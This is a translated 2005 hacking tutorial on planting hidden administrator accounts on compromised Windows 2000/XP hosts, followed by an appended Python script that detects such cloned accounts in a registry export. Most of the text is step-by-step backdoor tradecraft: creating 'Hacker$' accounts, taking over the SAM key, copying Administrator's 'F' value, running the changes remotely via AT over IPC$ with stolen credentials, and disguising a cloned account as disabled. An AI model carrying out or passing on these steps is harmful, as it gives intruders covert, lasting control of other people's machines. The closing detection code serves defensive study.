Author: Chen Ten Thirteen
Source:
Release time: 2005-05-17 22:28:54
A few days ago, on some website (I forget which one, sorry ^_*), I saw an illustrated tutorial on building a hidden superuser, and it gave me a lot of inspiration. The author only explained how to create the hidden superuser locally through the graphical interface, and said that he had not managed to do it from the command line, so I started exploring. At first I used reg.exe (version 3.0) as the command-line tool to import the registry file, but after each import the hidden superuser could not be used. Opening the registry to look, I found that the hidden superuser's default data type had not been imported. Because this data type is a hexadecimal number (for example, the default data type of Administrator is 000001F4, and in the example below it is 00000409) rather than a string, DWORD or binary type, reg.exe cannot recognize it and therefore cannot import it, while the registry editor regedit.exe can import it through its graphical interface. Then it occurred to me that regedit.exe is a dual-mode program: it can run in the Windows interface or under DOS. Since the graphical regedit.exe can import this data type, it should be able to import it from the command line as well, and later experiments proved this right. Below I write up my method for creating a hidden superuser.

I. Building a hidden superuser from the graphical interface

This applies to the local machine, or to a compromised host (the original calls it a 肉鸡, "broiler"; "target host" below) reached through the 3389 terminal service. The author I mentioned above explained it very well, but the method is rather complicated and depends on PSU.exe (a program that runs a process as the system user), which you would have to upload to the target host. The method I describe does not need PSU.exe, because Windows 2000 has two registry editors: regedit.exe and regedt32.exe. In XP, regedit.exe and regedt32.exe are actually the same program, and permissions are changed through "Permissions" in the right-click menu of a key.
I think everyone is familiar with regedit.exe, but it cannot set permissions on the registry; the great advantage of regedt32.exe is that it can. The account information of NT/2000/XP is under the registry key HKEY_LOCAL_MACHINE\SAM\SAM, but other users have no right to view what is inside, so I first use regedt32.exe to give myself "Full Control" on the SAM key, which makes the information under it readable and writable. The specific steps are as follows:

1) Assume we are logged on to the target host's terminal service as the superuser Administrator. First create an account, Hacker$, either from the command line or in the account manager; here I create it from the command line:
   net user Hacker$ 1234 /add
2) In Start / Run, enter regedt32.exe and press Enter to start regedt32.exe.
3) With the SAM key selected, click "Permissions" in the Security menu. In the window that pops up, click Add and add the account you are logged on with. Here I am logged on as Administrator, so I add Administrator and set its permission to "Full Control". Note: it is best to add the account you are logged on with, or the group it belongs to, rather than modifying the existing accounts or groups; otherwise it brings a series of unnecessary problems. Once the hidden superuser has been built, come back here and delete the account you added.
4) Click Start / Run, enter regedit.exe and press Enter to start the registry editor regedit.exe.
Open the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Hacker$.
5) Export the items Hacker$, 00000409 and 000001F4 as Hacker.reg, 409.reg and 1F4.reg. Open the exported files in Notepad, copy the value of the key "F" under item 000001F4 (which corresponds to the superuser) over the value of the key "F" under item 00000409 (which corresponds to Hacker$), and then merge 409.reg into Hacker.reg.
6) On the command line, execute net user Hacker$ /del to delete the user Hacker$.
7) Press F5 in the regedit.exe window to refresh, then use File / Import Registry File to import the modified Hacker.reg into the registry.
8) Restore the SAM key's permissions to their original state (just remove the Administrator account you added).
9) Note: after the hidden superuser is built, you cannot see Hacker$ in the account manager, and the net user command does not show it either. Do not change its password once the superuser is established: if you use net user to change Hacker$'s password, this hidden superuser becomes visible in the account manager and cannot be deleted.

II. Remotely building a hidden superuser from the command line

This uses the AT command, because the scheduled task created by AT runs as system, so PSU.exe is not needed. To use the AT command, the target host must have the Schedule service running; if it is not running, start it remotely with netsvc.exe or sc.exe from the Fluxay (流光) toolkit, and of course any other way of starting the Schedule service also works. For command-line mode you can use all sorts of connection methods: connecting to MSSQL on port 1433 with SQLEXEC, using the Telnet service, and so on; as long as you get a cmdshell, you can run the AT command.

1) First find a target host; how to get one is not the topic here.
Assume we have found a target host whose superuser is Administrator with password 12345678; now we start to remotely build a hidden superuser on it from the command line. (The host in the example is a machine on my LAN; I have changed its IP address to 13.50.97.238. Do not try it on the Internet, to avoid harassing whoever normally uses that address.)
2) First establish a connection to the target host: net use \\13.50.97.238\ipc$ "12345678" /user:"Administrator"
3) Create a user on the target host with the AT command (if the Schedule service is not running, start it remotely with netsvc.exe or sc.exe): AT \\13.50.97.238 12:51 C:\Winnt\System32\net.exe user Hacker$ 1234 /add. Because the user name created this way ends in $, net user does not display it on the command line, but it can still be seen in the account manager.
4) Export HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users the same way: AT \\13.50.97.238 12:55 C:\Winnt\Regedit.exe /e Hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\. Here /e is a regedit.exe parameter, and the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ must end with a backslash. If necessary, put the command in quotation marks: "C:\Winnt\Regedit.exe /e Hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\".
5) Download Hacker.reg from the target host to this machine and edit it in Notepad, using the copy command: copy \\13.50.97.238\admin$ (how to edit the file was explained in section I and is not repeated here).
6) Then copy the edited Hacker.reg back to the target host: copy C:\Hacker.reg \\13.50.97.238\admin$\system32\Hacker1.reg
7) Check the target host's time with net time \\13.50.97.238, then delete the user Hacker$ with the AT command: AT \\13.50.97.238 13:40 net user Hacker$ /del
8) Verify that Hacker$ has been deleted: disconnect from the target host with net use \\13.50.97.238 /del, then try to connect as Hacker$ with net use \\13.50.97.238\ipc$ "1234" /user:"Hacker$"; if the connection fails, the account has been deleted.
9) Re-establish the connection to the target host: net use \\13.50.97.238\ipc$ "12345678" /user:"Administrator". Get the target's time, then use the AT command to import the Hacker1.reg on the target into its registry: AT \\13.50.97.238 13:41 C:\Winnt\Regedit.exe /s Hacker1.reg. The /s parameter means silent mode.
10) Verify that Hacker$ has been created, in the same way as verifying that it was deleted above.
11) Then verify that the user Hacker$ has read, write and delete permissions; if you are still not sure, you can also verify that it can create other accounts.
12) From step 11 you can conclude that the user Hacker$ has superuser privileges, because the account I originally created with the AT command was an ordinary user, but it now has remote read, write and delete permissions.
III. What if the target host does not have the 3389 terminal service open and I do not want to use the command line? In that case you can also build a hidden superuser on the target host through the graphical interface. Because regedit.exe and regedt32.exe can both connect to a network registry, you can use regedt32.exe to set permissions on the remote host's registry keys and regedit.exe to edit the remote registry; the account manager can also connect to another computer, so you can use it to create and delete accounts on the remote host. The specific steps are similar to the above and I will not repeat them; the only drawback is that the speed is unbearable. But there are two preconditions:
1) First use net use \\target-ip\ipc$ "password" /user:"superuser name" to establish a connection to the remote host, so that regedit.exe, regedt32.exe and the account manager can connect to it.
2) The remote host must have the Remote Registry service running (if it is not, you can start it remotely, since you have the superuser password).

IV. Building a hidden superuser from a disabled account

We can use a disabled user on the target host to build a hidden superuser. The method is as follows:
1) First look carefully at which users are disabled. In general, some administrators disable Guest for security reasons, and of course other accounts may be disabled too. In the graphical interface this is easy: a disabled account shows a red cross. On the command line I have not thought of a good way; I can only run "net user <user name>" for each user in turn to see whether it is disabled.
2) Here we assume the user Hacker has been disabled by the administrator. First I use Xiaoyan's clone program ca.exe to clone the disabled user Hacker into a superuser (after cloning, the user Hacker is automatically activated): ca.exe \\target-ip Administrator <superuser password> Hacker <Hacker's password>
3) If you now have a cmdshell, whether from the Telnet service or from connecting to MSSQL's default port 1433 with SQLEXEC, just enter the command net user Hacker /active:no and the user Hacker is disabled again (at least on the surface). Of course you can replace the user Hacker with any other disabled user.
4) Now if you look at the user in the account manager under the graphical interface, you will find that Hacker is disabled. But is it really? Connect to the target host with this disabled user and see whether it works: net use \\target-ip\ipc$ "Hacker's password" /user:"Hacker". I can tell you that after many tests it succeeds, and with superuser privileges.
5) What if there is no cmdshell? You can disable the user Hacker with AT; the command format is: AT \\target-ip <time> net user Hacker /active:no
6) Principle: I cannot explain the specific, deeper principle; I can only put it in the simplest terms. If you first try to disable the superuser Administrator in the account manager under the graphical interface, a dialog box pops up and forbids you from disabling the superuser Administrator. During cloning, Hacker's "F" key in the registry is replaced with the superuser Administrator's "F" key, so Hacker has the superuser's permissions; but because Hacker's "C" key in the registry is still the original "C" key, Hacker remains disabled, while its superuser permissions are not disabled. So the disabled user can still connect to the target host, and with superuser permissions. If I have not explained it clearly, just understand it that way.

V. Notes:
1) After the hidden superuser is built, you cannot see this user in the account manager or on the command line, but the user exists.
2) After the hidden superuser is built, its password cannot be changed again, because once the password is changed this hidden superuser is exposed in the account manager and cannot be deleted.
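The principle above and the export in section II point at a simple check a defender can run over a regedit /e export of the Users key: a cloned account is one whose "F" value carries a RID other than its own key name (000001F4 copied under 00000409 in the example). The following Python is an added example, not code from the original article; it assumes the RID sits at offset 0x30 and the account-control flags at 0x38 inside F, builds a constructed sample export in the wrapped hex format regedit writes, and flags the mismatches, also reporting which of them are disabled (the section IV case).

```python
import re

# Assumed layout of the SAM "F" blob: own RID at 0x30 (DWORD), ACB flags at 0x38.
RID_OFF, FLAGS_OFF, ACB_DISABLED = 0x30, 0x38, 0x0001
USERS_KEY = r"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"

def build_f(rid, acb_flags):
    """Constructed minimal F blob: only RID and flags set, everything else zero."""
    f = bytearray(0x50)
    f[RID_OFF:RID_OFF + 4] = rid.to_bytes(4, "little")
    f[FLAGS_OFF:FLAGS_OFF + 2] = acb_flags.to_bytes(2, "little")
    return bytes(f)

def to_reg(users):
    """Render {key_name: F_bytes} like 'regedit /e', with wrapped hex lines."""
    out = ["Windows Registry Editor Version 5.00", ""]
    for name, f in users.items():
        parts = [f"{b:02x}" for b in f]
        rows = [",".join(parts[i:i + 25]) for i in range(0, len(parts), 25)]
        out += [f"[{USERS_KEY}\\{name}]", '"F"=hex:' + ",\\\n  ".join(rows), ""]
    return "\n".join(out)

def parse_f_values(reg_text):
    """Return {key_name: F_bytes} for every Users\\<8 hex digits> key."""
    joined = re.sub(r"\\\r?\n\s*", "", reg_text)  # undo '\' line continuation
    result, key = {}, None
    for line in joined.splitlines():
        m = re.match(r"\[.*\\Users\\([0-9A-Fa-f]{8})\]$", line)
        if m:
            key = m.group(1)
        elif key and line.startswith('"F"=hex:'):
            result[key] = bytes.fromhex(line[8:].replace(",", ""))
    return result

def find_cloned_accounts(reg_text):
    """(key_name, rid_in_F, is_disabled) for each user whose F carries another
    account's RID, i.e. an F value copied from a different user."""
    findings = []
    for name, f in parse_f_values(reg_text).items():
        f_rid = int.from_bytes(f[RID_OFF:RID_OFF + 4], "little")
        flags = int.from_bytes(f[FLAGS_OFF:FLAGS_OFF + 2], "little")
        if f_rid != int(name, 16):
            findings.append((name, f_rid, bool(flags & ACB_DISABLED)))
    return findings

# Constructed sample: Administrator, disabled Guest, Hacker$ (RID 0x409) with
# Administrator's F copied in, and a disabled account cloned the same way.
SAMPLE_REG = to_reg({"000001F4": build_f(0x1F4, 0x0010),
                     "000001F5": build_f(0x1F5, 0x0011),
                     "00000409": build_f(0x1F4, 0x0010),
                     "0000040A": build_f(0x1F4, 0x0011)})
```

Running find_cloned_accounts(SAMPLE_REG) reports 00000409 and 0000040A, both holding RID 0x1F4, with only the second marked disabled; the legitimate Administrator and Guest entries are not reported.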